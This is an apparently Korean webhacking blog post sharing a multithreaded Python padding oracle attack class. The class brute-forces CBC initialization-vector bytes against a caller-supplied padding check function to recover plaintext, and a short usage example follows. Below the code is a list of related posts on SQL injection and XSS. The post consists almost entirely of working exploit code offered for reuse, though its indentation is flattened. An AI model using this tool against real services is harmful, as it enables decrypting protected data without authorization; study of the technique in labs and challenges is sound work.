##coded by sakuya
from base64 import *
import json
import threading
import math
class oracle:
def __str__(self):
return self.plainText[::-1]
def __init__(self, data,iv=None):
if iv == None:
self.IV = bytearray("\x00"*len(data),encoding="latin-1")
else:
self.IV = iv
self.hiddenValue = bytearray("\x00"*len(data),encoding="latin-1")
self.block = bytearray(data)
self.block_size = len(self.block)
self.IVMutex = threading.Lock()
self.currentIdx = 1
self.TestIV = bytearray("\x00"*len(data),encoding="latin-1")
self.plainText = ""
self.Pause = threading.Lock()
self.Pause.acquire()
def adjustIV(self,iv):
self.IVMutex.acquire()
idx = self.block_size-self.currentIdx
self.hiddenValue[idx] = iv[idx] ^ self.currentIdx
plain = iv[idx] ^ self.currentIdx ^ self.IV[idx]
self.currentIdx += 1
for i in range(idx,self.block_size):
iv[i] = self.hiddenValue[i] ^ self.currentIdx
self.TestIV = iv[:]
self.IVMutex.release()
return chr(plain)
def exploit(self, check_func, count=10):
MIN = 0x00
MAX = 0x100
RANGE = list(range(MIN,MAX))
ThreadCount = math.ceil(MAX/count)
for i in range(MIN,MAX,ThreadCount):
t = threading.Thread(target=self.__exploit,args=(RANGE[i:i+ThreadCount],check_func,))
t.start()
self.Pause.acquire()
self.Pause.release()
def __exploit(self, coverage, check_func):
TID = threading.get_ident()
self.block_size = len(self.block)
while(1):
test_iv = self.TestIV[:]
if self.currentIdx > self.block_size:
break
for i in coverage:
test_iv[self.block_size-self.currentIdx] = i
if(check_func(test_iv,self.block)):
print(test_iv)
self.plainText += self.adjustIV(test_iv)
break;
try:
self.Pause.release()
except:
pass
사용예시
O = oracle(cipher, iv=iv)
O.exploit(checkFunc, count = 0xff)
print(str(O))
count는 Thread 갯수임미다..
'Web' 카테고리의 다른 글
Webhacking Study - Binary search with filtering (0) | 2019.10.10 |
---|---|
XSS TEST (0) | 2019.04.15 |
[TIP?] sql injection을 위한 깔끔한 코드 작성법 (2) | 2018.08.21 |
Webhacking Study - Query sniff (2) | 2018.04.06 |
Webhacking Study - no more BLIND (6) | 2017.04.18 |